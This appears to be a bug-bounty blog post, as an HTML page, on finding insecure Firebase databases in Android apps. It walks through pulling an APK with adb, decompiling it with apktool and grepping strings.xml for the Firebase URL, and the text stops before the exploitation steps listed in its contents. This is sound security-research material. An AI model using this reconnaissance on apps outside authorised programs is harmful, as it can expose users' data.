
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
        <link rel="canonical" href="https://tanish-26.github.io/Logic26/Blogs/insecure_firebase_blog/">
      
      
        <link rel="prev" href="../..">
      
      
        <link rel="next" href="../EXPLOIT_SECURITY_IoT_CTF/">
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.6.15">
    
    
      
        <title>Hunting for Firebase Enums in Android Application - Logic26</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.342714a4.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
      <link rel="stylesheet" href="../../stylesheets/extra.css">
    
    <script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
   <link href="../../assets/stylesheets/glightbox.min.css" rel="stylesheet"/><style>
    html.glightbox-open { overflow: initial; height: 100%; }
    .gslide-title { margin-top: 0px; user-select: text; }
    .gslide-desc { color: #666; user-select: text; }
    .gslide-image img { background: white; }
    .gscrollbar-fixer { padding-right: 15px; }
    .gdesc-inner { font-size: 0.75rem; }
    body[data-md-color-scheme="slate"] .gdesc-inner { background: var(--md-default-bg-color);}
    body[data-md-color-scheme="slate"] .gslide-title { color: var(--md-default-fg-color);}
    body[data-md-color-scheme="slate"] .gslide-desc { color: var(--md-default-fg-color);}</style> <script src="../../assets/javascripts/glightbox.min.js"></script></head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="green" data-md-color-accent="red">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#how-i-found-2-insecure-firebase-databases" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../.." title="Logic26" class="md-header__button md-logo" aria-label="Logic26" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Logic26
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Hunting for Firebase Enums in Android Application
            
          </span>
        </div>
      </div>
    </div>
    
      
    
    
    
    
      
      
        <label class="md-header__button md-icon" for="__search">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        </label>
        <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
      
    
    
      <div class="md-header__source">
        <a href="https://github.com/Tanish-26/Logic26/" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.7.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81"/></svg>
  </div>
  <div class="md-source__repository">
    Tanish-26/Logic26/
  </div>
</a>
      </div>
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    



<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="Logic26" class="md-nav__button md-logo" aria-label="Logic26" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    Logic26
  </label>
  
    <div class="md-nav__source">
      <a href="https://github.com/Tanish-26/Logic26/" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.7.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81"/></svg>
  </div>
  <div class="md-source__repository">
    Tanish-26/Logic26/
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Home
    
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
    
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" checked>
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Blogs
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            Blogs
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
    
  
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  
  <span class="md-ellipsis">
    Hunting for Firebase Enums in Android Application
    
  </span>
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  
  <span class="md-ellipsis">
    Hunting for Firebase Enums in Android Application
    
  </span>
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#what-is-firebase" class="md-nav__link">
    <span class="md-ellipsis">
      What is Firebase?
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#why-this-blog" class="md-nav__link">
    <span class="md-ellipsis">
      Why This Blog?
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#the-process" class="md-nav__link">
    <span class="md-ellipsis">
      The Process
    </span>
  </a>
  
    <nav class="md-nav" aria-label="The Process">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#1-choose-a-target-app" class="md-nav__link">
    <span class="md-ellipsis">
      1. Choose a Target App
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#2-get-the-apk-file" class="md-nav__link">
    <span class="md-ellipsis">
      2. Get the APK File
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#3-pull-the-apk-using-adb" class="md-nav__link">
    <span class="md-ellipsis">
      3. Pull the APK Using ADB
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#4-decompile-the-apk" class="md-nav__link">
    <span class="md-ellipsis">
      4. Decompile the APK
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#5-find-the-firebase-url" class="md-nav__link">
    <span class="md-ellipsis">
      5. Find the Firebase URL
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#6-check-for-vulnerability" class="md-nav__link">
    <span class="md-ellipsis">
      6. Check for Vulnerability
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#7-exploit-the-firebase-db" class="md-nav__link">
    <span class="md-ellipsis">
      7. Exploit the Firebase DB
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#final-thoughts" class="md-nav__link">
    <span class="md-ellipsis">
      Final Thoughts
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../EXPLOIT_SECURITY_IoT_CTF/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Exploit Security IOT CTF
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../Introduction-to-Insecure-Deserialization/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Introduction to Insecure Deserilazation
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../PortSwigger-Insecure-Deseleraization-Part-1/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    PortSwigger Insecure Deseleraization Part 1
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../PortSwigger-Insecure-Deseleraization-Part-2/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    PortSwigger Insecure Deseleraization Part 2
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    CTF Writeups
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            CTF Writeups
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3_1" >
        
          
          <label class="md-nav__link" for="__nav_3_1" id="__nav_3_1_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    HackTheBox
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_3_1_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3_1">
            <span class="md-nav__icon md-icon"></span>
            HackTheBox
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/Hackthebox_Photonlocakdown/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Photon Lockdown
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/Hackthebox_The_Needle/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Needle
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-Behind-the-Scenes/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Behind The Scenes
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-Cat/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Cat
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-Debugging-Interface/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Debbing Interface
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-Jscalc/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Jscalc
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-RFlag/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    RFlag
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-Signals/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Signals
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-Topology/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Topology
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-Toxic/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Toxic
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-LoveTok/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    LoveTok
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-Analytics/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Analytics
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-Weather-App/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Weather App
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-M0rsarchive/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    M0rsarchive
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-RenderQuest/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    RenderQuest
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-Illumination/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Illumination
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/HackTheBox-Canvas/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Canva
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3_2" >
        
          
          <label class="md-nav__link" for="__nav_3_2" id="__nav_3_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Tryhackme
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_3_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3_2">
            <span class="md-nav__icon md-icon"></span>
            Tryhackme
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/TryHackMe-Bounty-Hunter/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Bounty-Hunter
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/TryHackMe-Brooklyn-Nine-Nine/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Brooklyn-Nine-Nine
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/TryHackMe-Committed/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Committed
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/TryHackMe-Git-Happens/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Git-Happens
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/TryHackMe-Grep/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Grep
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/TryHackMe-HeartBleed/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    HeartBleed
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/TryHackMe-Pickle-Rick/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Pickle Rick
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/TryHackMe-TakeOver/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    TakeOver
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../CTF/TryHackMe-TomGhost/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    TomGhost
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#what-is-firebase" class="md-nav__link">
    <span class="md-ellipsis">
      What is Firebase?
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#why-this-blog" class="md-nav__link">
    <span class="md-ellipsis">
      Why This Blog?
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#the-process" class="md-nav__link">
    <span class="md-ellipsis">
      The Process
    </span>
  </a>
  
    <nav class="md-nav" aria-label="The Process">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#1-choose-a-target-app" class="md-nav__link">
    <span class="md-ellipsis">
      1. Choose a Target App
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#2-get-the-apk-file" class="md-nav__link">
    <span class="md-ellipsis">
      2. Get the APK File
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#3-pull-the-apk-using-adb" class="md-nav__link">
    <span class="md-ellipsis">
      3. Pull the APK Using ADB
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#4-decompile-the-apk" class="md-nav__link">
    <span class="md-ellipsis">
      4. Decompile the APK
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#5-find-the-firebase-url" class="md-nav__link">
    <span class="md-ellipsis">
      5. Find the Firebase URL
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#6-check-for-vulnerability" class="md-nav__link">
    <span class="md-ellipsis">
      6. Check for Vulnerability
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#7-exploit-the-firebase-db" class="md-nav__link">
    <span class="md-ellipsis">
      7. Exploit the Firebase DB
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#final-thoughts" class="md-nav__link">
    <span class="md-ellipsis">
      Final Thoughts
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  


  
  


<h1 id="how-i-found-2-insecure-firebase-databases">How I Found 2 Insecure Firebase Databases</h1>
<p><a class="glightbox" href="../../assets/firebase1.jpg" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="Open Lightbox" class="glightbox center" src="../../assets/firebase1.jpg" width="600" /></a></p>
<p>A few weeks back, I was doing some bounty hunting on Android apps when I came across <strong>two mobile applications</strong> vulnerable to <strong>Firebase enumeration</strong>.</p>
<h2 id="what-is-firebase">What is Firebase?</h2>
<p><strong>Firebase</strong> is a backend development platform by Google. Due to <strong>insecure configurations</strong>, it’s sometimes possible to <strong>enumerate resources without proper authorization</strong> and access unsafe data.</p>
<p>These misconfigurations are commonly found in Android apps. Although the chances of finding one might seem low, once you start actively looking, there's a decent chance you'll spot one.</p>
<hr />
<p>💡 Even though I didn’t receive a bounty for this vulnerability (despite <a href="#">HackerOne reports</a> rating similar issues as <strong>severity 9–10</strong>), both companies I reported to were major Indian brands listed on bug bounty platforms—and still didn’t even offer a <strong>Hall of Fame</strong> mention.  </p>
<p>I felt… betrayed 😅    </p>
<p><a class="glightbox" href="../../assets/1_9irSLF5ztrsUTGHbhTSJow.gif" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="Open Lightbox" class="glightbox center" src="../../assets/1_9irSLF5ztrsUTGHbhTSJow.gif" width="500" /></a></p>
<hr />
<h2 id="why-this-blog">Why This Blog?</h2>
<p>I wanted to write this post because <strong>it was surprisingly easy to find</strong>. Once you automate most of the process, spotting an insecure Firebase instance becomes <strong>a piece of cake</strong>—especially if you're checking 20–30 apps.</p>
<div class="admonition note">
<p>Choose any Android app that is listed in any bug bounty platform 
or is open For a vulnerability discloser program and then you can
go ahead and Perform the following steps</p>
</div>
<hr />
<h2 id="the-process">The Process</h2>
<h3 id="1-choose-a-target-app">1. Choose a Target App</h3>
<p>Pick any Android app that is:</p>
<ul>
<li>Listed on a <strong>bug bounty platform</strong>, or</li>
<li>Open for a <strong>vulnerability disclosure program</strong></li>
</ul>
<hr />
<h3 id="2-get-the-apk-file">2. Get the APK File</h3>
<p>You’ll need the APK file. You can use:</p>
<ul>
<li><strong>Genymotion Emulator</strong>: <a href="https://www.genymotion.com/">https://www.genymotion.com/</a></li>
<li><strong>APKPure</strong>: <a href="https://apkpure.net">https://apkpure.net</a> <em>(Note: APKs may be outdated)</em></li>
</ul>
<p>If you're using an emulator like Genymotion:</p>
<ol>
<li>Set up the emulator.</li>
<li>Install the target APK.</li>
<li>Proceed to pull the APK file.</li>
</ol>
<hr />
<h3 id="3-pull-the-apk-using-adb">3. Pull the APK Using ADB</h3>
<blockquote>
<p>Tool: <a href="https://developer.android.com/tools/adb">Android Debug Bridge (ADB)</a></p>
</blockquote>
<p>Run the following command:</p>
<div class="language-bash highlight"><pre><span></span><code><span id="__span-0-1"><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a>adb<span class="w"> </span>shell<span class="w"> </span>pm<span class="w"> </span>list<span class="w"> </span>packages<span class="w"> </span>-f<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>&lt;APK<span class="w"> </span>name&gt;
</span></code></pre></div>
<p>You’ll get the APK's full path (ignore <code>package:</code> prefix).  </p>
<p><a class="glightbox" href="../../assets/adb_shell.webp" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="Open Lightbox" class="glightbox center" src="../../assets/adb_shell.webp" width="700" /></a></p>
<p>Now pull the APK:</p>
<div class="language-bash highlight"><pre><span></span><code><span id="__span-1-1"><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a>adb<span class="w"> </span>pull<span class="w"> </span>&lt;path_to_the_APK_file_till_base.apk&gt;
</span></code></pre></div>
<p>✅ You now have the APK file.</p>
<hr />
<h3 id="4-decompile-the-apk">4. Decompile the APK</h3>
<p>Use <a href="https://ibotpeaches.github.io/Apktool/"><strong>Apktool</strong></a> to decompile:</p>
<div class="language-bash highlight"><pre><span></span><code><span id="__span-2-1"><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a>apktool<span class="w"> </span>d<span class="w"> </span>base.apk
</span></code></pre></div>
<p>A new folder will be created with all the APK contents. Look inside the <code>/res</code> directory.</p>
<hr />
<h3 id="5-find-the-firebase-url">5. Find the Firebase URL</h3>
<p>Search inside <code>strings.xml</code>:</p>
<div class="language-bash highlight"><pre><span></span><code><span id="__span-3-1"><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a>cat<span class="w"> </span>res/values/strings.xml<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>firebase
</span></code></pre></div>
<p>You should see a Firebase URL that looks like:</p>
<div class="language-text highlight"><pre><span></span><code><span id="__span-4-1"><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a>https://&lt;project-id&gt;.firebaseio.com
</span></code></pre></div>
